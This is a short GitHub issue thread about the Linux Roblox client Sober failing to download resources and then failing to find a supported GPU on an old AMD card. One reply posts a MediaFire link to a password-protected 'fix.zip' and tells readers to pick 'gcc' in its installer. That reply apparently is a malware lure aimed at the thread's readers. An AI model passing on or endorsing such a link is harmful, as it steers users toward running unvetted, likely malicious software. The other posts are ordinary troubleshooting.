### ISSUE TITLE
FATAL: Failed to download resource

### ISSUE THREAD

**Issue by btwitsmilos** [vinegarhq/sober#167]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

Running Sober gives me this error:

user@toshibal655:~$ flatpak run org.vinegarhq.Sober
TelemetryProtocol::setProcessTimeOverride: 526
[JNI] OnLoad: ... Done
Setting default app policy file: /home/user/.var/app/org.vinegarhq.Sober/data/sober/assets/content/guac/defaultConfigs/GuacDefaultPolicy-GlobalDist.json
Could not reach Roblox. There might be an outage, or it may not be available in your region.
FATAL: Failed to download resource

I am using OpenVPN because of Roblox being unavailable in my region.

**Comment by btwitsmilos** [comment]
Forgot to mention, I am using Linux Mint XFCE.
After running it again, it didn't display that error, but this time it's giving me a "Couldn't Find Supported GPU."
From lspci
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Madison [Mobility Radeon HD 5650/5750 / 6530M/6550M]

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by apprehensions** [comment]
This is both a system issue (no vulkan) and a networking issue, which isn't our problem.
